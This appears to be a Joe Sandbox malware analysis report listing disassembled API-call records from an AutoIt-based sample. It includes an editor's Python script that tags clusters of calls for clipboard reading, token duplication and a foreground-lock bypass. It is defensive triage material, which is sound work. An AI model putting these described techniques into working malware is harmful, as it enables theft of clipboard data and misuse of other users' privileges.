                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 74d596c4ff14d3e42860f057a4ccee545acaf08fa1538b26200f8ef4020c0803
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: ED31C270A00105DFEB18EF58D4809A9F7A6FF5A300B648AA5E809DB751D731EDC1DF80
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 036822B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 13c3d2728d670d4dac60050ea7ae45c6119e82cb2fbd58be1612d48666da727d
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 84E0E67494010EDFDB00EFB8D54969E7FB4EF04701F1006A1FD01D2280D6309D508A72
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0070CE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0070CE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0070CED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0070CF00
                    • SendMessageW.USER32 ref: 0070CF29
                    • _wcsncpy.LIBCMT ref: 0070CFA1
                    • GetKeyState.USER32(00000011), ref: 0070CFC2
                    • GetKeyState.USER32(00000009), ref: 0070CFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0070CFE5
                    • GetKeyState.USER32(00000010), ref: 0070CFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0070D018
                    • SendMessageW.USER32 ref: 0070D03F
                    • SendMessageW.USER32(?,00001030,?,0070B602), ref: 0070D145
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0070D15B
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0070D16E
                    • SetCapture.USER32(?), ref: 0070D177
                    • ClientToScreen.USER32(?,?), ref: 0070D1DC
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0070D1E9
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0070D203
                    • ReleaseCapture.USER32 ref: 0070D20E
                    • GetCursorPos.USER32(?), ref: 0070D248
                    • ScreenToClient.USER32(?,?), ref: 0070D255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0070D2B1
                    • SendMessageW.USER32 ref: 0070D2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0070D31C
                    • SendMessageW.USER32 ref: 0070D34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0070D36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0070D37B
                    • GetCursorPos.USER32(?), ref: 0070D39B
                    • ScreenToClient.USER32(?,?), ref: 0070D3A8
                    • GetParent.USER32(?), ref: 0070D3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0070D431
                    • SendMessageW.USER32 ref: 0070D462
                    • ClientToScreen.USER32(?,?), ref: 0070D4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0070D4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0070D51A
                    • SendMessageW.USER32 ref: 0070D53D
                    • ClientToScreen.USER32(?,?), ref: 0070D58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0070D5C3
                      • Part of subcall function 006825DB: GetWindowLongW.USER32(?,000000EB), ref: 006825EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070D65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F$prt
                    • API String ID: 3977979337-532765885
                    • Opcode ID: 40d854918ee7a50ad886d91d641be4770073721ef5ee19313e3de2e04e9ec52e
                    • Instruction ID: 239c9c94bee584c962cd04b2c27168636ca4561d5ef4603e7eb78e71ec16a154
                    • Opcode Fuzzy Hash: 40d854918ee7a50ad886d91d641be4770073721ef5ee19313e3de2e04e9ec52e
                    • Instruction Fuzzy Hash: 1942AD34204341EFD726CF68C844AAABBE5FF49314F14472DF6958B2E0CB79A851CB96
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0070873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: ec098507278b7261375e6464d67704b078f3fc40ecb842fdd3afab772d455365
                    • Instruction ID: d5b0f48b021b3d394620f331297f35567c97fea5ca5be9fba891ece48846512f
                    • Opcode Fuzzy Hash: ec098507278b7261375e6464d67704b078f3fc40ecb842fdd3afab772d455365
                    • Instruction Fuzzy Hash: C012CD71500208EBEBA59F64CC49FAA7BF8EF45310F244329F955EA2E1DFB88941CB15
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: 0ws$DEFINE$Oai$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-3573026870
                    • Opcode ID: 6bb2ee878fa936465fd24d1ed8625a575a75d6c5c26c1560a1c67c939997e795
                    • Instruction ID: 2a665662c19d1a1b5b591787f082b840c2bcc9c8d69a66b8ccbb68bc0abd244b
                    • Opcode Fuzzy Hash: 6bb2ee878fa936465fd24d1ed8625a575a75d6c5c26c1560a1c67c939997e795
                    • Instruction Fuzzy Hash: 67937E71E042169BDF24CF58C891AEDB7B2FF58710F25816AE955AB381E7709E82CB40
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00684A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006BDA8E
                    • IsIconic.USER32(?), ref: 006BDA97
                    • ShowWindow.USER32(?,00000009), ref: 006BDAA4
                    • SetForegroundWindow.USER32(?), ref: 006BDAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006BDAC4
                    • GetCurrentThreadId.KERNEL32 ref: 006BDACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006BDAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 006BDAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 006BDAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 006BDAF8
                    • SetForegroundWindow.USER32(?), ref: 006BDAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB10
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB25
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB33
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB42
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB47
                    • SetForegroundWindow.USER32(?), ref: 006BDB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 006BDB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: 6df518e624066c0dd0585920eb0273d20ac87745bd9324d6f96e555440575664
                    • Instruction ID: 69dfedb1f736c73b88a6a6520ef1f38fe6988760d462abf37134b268c8333137
                    • Opcode Fuzzy Hash: 6df518e624066c0dd0585920eb0273d20ac87745bd9324d6f96e555440575664
                    • Instruction Fuzzy Hash: 8D31D6B1A40318BFEB306F619C49FBF7E6DEB44B50F118125FA00EA1D0DAB55C51ABA4
                    APIs
                      • Part of subcall function 006D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D8D0D
                      • Part of subcall function 006D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D8D3A
                      • Part of subcall function 006D8CC3: GetLastError.KERNEL32 ref: 006D8D47
                    • _memset.LIBCMT ref: 006D889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006D88ED
                    • CloseHandle.KERNEL32(?), ref: 006D88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006D8915
                    • GetProcessWindowStation.USER32 ref: 006D892E
                    • SetProcessWindowStation.USER32(00000000), ref: 006D8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006D8952
                      • Part of subcall function 006D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006D8851), ref: 006D8728
                      • Part of subcall function 006D8713: CloseHandle.KERNEL32(?,?,006D8851), ref: 006D873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 44b510b34f3f0d2270e1715cb2408f45823ebc21e5705b433a92f62006b24b7c
                    • Instruction ID: 723afc10a345a97d5e42f48d6de5e408dfadd67fae6e8704e5c4dcfa45bc4103
                    • Opcode Fuzzy Hash: 44b510b34f3f0d2270e1715cb2408f45823ebc21e5705b433a92f62006b24b7c
                    • Instruction Fuzzy Hash: 7B813A71D01249AFDF21DFA4DC49AEEBB7AAF04304F08416AF910A7361DF758E149B64
                    APIs
                    • OpenClipboard.USER32(0070F910), ref: 006F4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 006F4292
                    • GetClipboardData.USER32(0000000D), ref: 006F429A
                    • CloseClipboard.USER32 ref: 006F42A6
                    • GlobalLock.KERNEL32(00000000), ref: 006F42C2
                    • CloseClipboard.USER32 ref: 006F42CC
                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 006F42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 006F42EE
                    • GetClipboardData.USER32(00000001), ref: 006F42F6
                    • GlobalLock.KERNEL32(00000000), ref: 006F4303
                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 006F4337
                    • CloseClipboard.USER32 ref: 006F4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: a42f09f2fb545d195b5e5639660715c7c99cb210c38a1130754e56aab29bf478
                    • Instruction ID: 10f50a9c918cbee7e79701b6c9583bd75594dffe2618719b890f508b9fed3c52
                    • Opcode Fuzzy Hash: a42f09f2fb545d195b5e5639660715c7c99cb210c38a1130754e56aab29bf478
                    • Instruction Fuzzy Hash: 58518D35204205ABD310FF64DC86FBF77AAAF84B00F10862DF656D26A1DF74D9058B6A
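Three of the records above carry more signal than their fuzzy hashes: the GetForegroundWindow / FindWindowW(Shell_TrayWnd) / AttachThreadInput / keybd_event(00000012) cluster is the classic foreground-lock bypass (0x12 is VK_MENU, the Alt key, pressed synthetically after attaching to the foreground thread's input queue); the LookupPrivilegeValueW / AdjustTokenPrivileges / DuplicateTokenEx / OpenWindowStationW(winsta0) / OpenDesktopW(default) cluster is the setup for starting a process as another user on the interactive desktop (DuplicateTokenEx's fifth argument, 00000001, is TokenPrimary); and the OpenClipboard / GetClipboardData(0000000D) / GetClipboardData(00000001) cluster reads CF_UNICODETEXT (13) and CF_TEXT (1) off the clipboard. The Python below is an added example written for this edit; it is not part of the Joe Sandbox report and not Joe Security tooling. It parses "APIs" records in exactly the format printed on this page and tags those clusters. The tag names, the rules, and the trimmed sample records (copied from the records above with lines left out) are the editor's own; the only constants it relies on are the public Win32 values named in the code.

```python
"""Tag triage-relevant API clusters in Joe Sandbox 'APIs' function records.
Added example (editor's code), not part of the Joe Sandbox report or Joe Security
tooling; tag names, rules and the trimmed SAMPLE records are the editor's own."""
from __future__ import annotations

import re
from dataclasses import dataclass

# One API line as the report prints it, e.g.
#   • keybd_event.USER32(00000012,00000000), ref: 006BDB1B
#   • Part of subcall function 006D8CC3: AdjustTokenPrivileges.ADVAPI32(...), ref: 006D8D3A
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
VK_MENU, CF_TEXT, CF_UNICODETEXT, TOKEN_PRIMARY = 0x12, 0x01, 0x0D, 1  # public Win32 values


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]      # raw tokens; '?' where the sandbox could not recover a value
    ref: str             # call-site address
    subcall: str | None  # caller address on 'Part of subcall function' lines


def parse_records(text: str) -> list[list[ApiCall]]:
    """A record starts at every 'APIs' header and holds that function's call lines."""
    records: list[list[ApiCall]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append([])
        elif records and (m := API_RE.search(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            records[-1].append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return records


def hexarg(call: ApiCall, i: int) -> int | None:
    """Argument i as an int, or None for '?', string literals and missing arguments."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None


def tag_record(calls: list[ApiCall]) -> list[str]:
    names = {c.api for c in calls}
    direct = {c.api for c in calls if c.subcall is None}
    tags: list[str] = []
    # AttachThreadInput to the foreground thread plus synthetic Alt (VK_MENU)
    # presses is the usual way round the SetForegroundWindow lock.
    if {"AttachThreadInput", "SetForegroundWindow"} <= names and any(
            c.api == "keybd_event" and hexarg(c, 0) == VK_MENU for c in calls):
        tags.append("foreground-lock bypass (AttachThreadInput + synthetic Alt)")
    if {"OpenClipboard", "GetClipboardData"} <= names:
        fmts = {hexarg(c, 0) for c in calls if c.api == "GetClipboardData"}
        kinds = [n for v, n in ((CF_TEXT, "CF_TEXT"), (CF_UNICODETEXT, "CF_UNICODETEXT")) if v in fmts]
        tags.append("clipboard read: " + ",".join(kinds))
    dup = next((c for c in calls if c.api == "DuplicateTokenEx"), None)
    if dup and {"OpenWindowStationW", "OpenDesktopW"} <= names:  # 5th argument is TokenType
        kind = "primary" if hexarg(dup, 4) == TOKEN_PRIMARY else "non-primary/unknown"
        tags.append(f"{kind} token + window station/desktop open (run as another user)")
    if "AdjustTokenPrivileges" in names:  # flag it even when only reached via a subcall
        tags.append("privilege adjustment" + ("" if "AdjustTokenPrivileges" in direct else " (in subcall)"))
    return tags


# Trimmed copies of three records from this page (lines omitted to keep it short).
SAMPLE = """\
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 00684A3D
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006BDA8E
• ShowWindow.USER32(?,00000009), ref: 006BDAA4
• AttachThreadInput.USER32(?,00000000,00000001), ref: 006BDAE8
• SetForegroundWindow.USER32(?), ref: 006BDAFB
• keybd_event.USER32(00000012,00000000), ref: 006BDB1B
APIs
  • Part of subcall function 006D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D8D0D
  • Part of subcall function 006D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D8D3A
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006D88ED
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006D8915
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006D8952
APIs
• OpenClipboard.USER32(0070F910), ref: 006F4284
• GetClipboardData.USER32(0000000D), ref: 006F429A
• GetClipboardData.USER32(00000001), ref: 006F42F6
• CloseClipboard.USER32 ref: 006F4447
"""

if __name__ == "__main__":
    for calls in parse_records(SAMPLE):
        print(calls[0].ref, "->", "; ".join(tag_record(calls)) or "(no tag)")
```

Run it directly and it prints one tag line per sample record; point parse_records at a saved copy of this page to apply the rules to every record. Two caveats from the listing itself. First, a tag says the function contains the capability, not that this run exercised it; the dynamic signatures elsewhere in the report are the evidence for that. Second, every one of these records comes from the image mapped at 00680000 (based on PE: true), the same image that carries the @GUI_DRAGID string in the GUI record above, which is an AutoIt macro name, so they describe the AutoIt runtime rather than the script it embeds. The single record from 03680000 (based on PE: false, a Sleep of 000001F4 = 500 ms) lies in memory not mapped from any PE on disk, and that region is where the disassembly time is better spent.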
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 006EC9F8
                    • FindClose.KERNEL32(00000000), ref: 006ECA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006ECA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006ECA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 006ECAAF
                    • __swprintf.LIBCMT ref: 006ECAFB
                    • __swprintf.LIBCMT ref: 006ECB3E
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • __swprintf.LIBCMT ref: 006ECB92
                      • Part of subcall function 006A38D8: __woutput_l.LIBCMT ref: 006A3931
                    • __swprintf.LIBCMT ref: 006ECBE0
                      • Part of subcall function 006A38D8: __flsbuf.LIBCMT ref: 006A3953
                      • Part of subcall function 006A38D8: __flsbuf.LIBCMT ref: 006A396B
                    • __swprintf.LIBCMT ref: 006ECC2F
                    • __swprintf.LIBCMT ref: 006ECC7E
                    • __swprintf.LIBCMT ref: 006ECCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 2088ee5bde9bcc38cb89d73a2f655db2b1fd911057d06892a9ba1a82a4ededf8
                    • Instruction ID: 94e0a662f87a91d35c179efa704aa7481c62cd3f152643c147fb64d701d900ad
                    • Opcode Fuzzy Hash: 2088ee5bde9bcc38cb89d73a2f655db2b1fd911057d06892a9ba1a82a4ededf8
                    • Instruction Fuzzy Hash: E8A15CB1408304ABC754FBA5C886DAFB7EDBF94704F444A2DF586C2191EB34DA09CB66
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006EF221
                    • _wcscmp.LIBCMT ref: 006EF236
                    • _wcscmp.LIBCMT ref: 006EF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 006EF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 006EF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 006EF291
                    • FindClose.KERNEL32(00000000), ref: 006EF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006EF2B8
                    • _wcscmp.LIBCMT ref: 006EF2DF
                    • _wcscmp.LIBCMT ref: 006EF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006EF308
                    • SetCurrentDirectoryW.KERNEL32(0073A5A0), ref: 006EF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006EF330
                    • FindClose.KERNEL32(00000000), ref: 006EF33D
                    • FindClose.KERNEL32(00000000), ref: 006EF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: 4017edfb603f979695185ff01fd2f0695bcae82fdba310e1887fdbe517e59008
                    • Instruction ID: 4ccb25d839666086435905013c49642e9d7d1deeefe84c03126c53d5384d85d8
                    • Opcode Fuzzy Hash: 4017edfb603f979695185ff01fd2f0695bcae82fdba310e1887fdbe517e59008
                    • Instruction Fuzzy Hash: F831F676502359AFDB20EBB1DC49ADE73ADAF09320F104275F910D3190EB34DE45CA58
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0070F910,00000000,?,00000000,?,?), ref: 00700C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00700C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00700D1D
                    • RegCloseKey.ADVAPI32(?), ref: 0070103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 0070104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: ea18d6a651dd451a8961d13ad3bafda70fced306eabd9872eda77368f4e86ffe
                    • Instruction ID: 7d0681c9aea3d10a193171df90e30fef092e28c7acf866776f2db91f00f1b300
                    • Opcode Fuzzy Hash: ea18d6a651dd451a8961d13ad3bafda70fced306eabd9872eda77368f4e86ffe
                    • Instruction Fuzzy Hash: 0A024B75200611DFCB54EF14C891A2AB7E5FF89714F088A5DF88A9B3A2CB34ED41CB95
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006EF37E
                    • _wcscmp.LIBCMT ref: 006EF393
                    • _wcscmp.LIBCMT ref: 006EF3AA
                      • Part of subcall function 006E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006E45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 006EF3D9
                    • FindClose.KERNEL32(00000000), ref: 006EF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006EF400
                    • _wcscmp.LIBCMT ref: 006EF427
                    • _wcscmp.LIBCMT ref: 006EF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006EF450
                    • SetCurrentDirectoryW.KERNEL32(0073A5A0), ref: 006EF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006EF478
                    • FindClose.KERNEL32(00000000), ref: 006EF485
                    • FindClose.KERNEL32(00000000), ref: 006EF497
                    Strings
                    Memory Dump Source
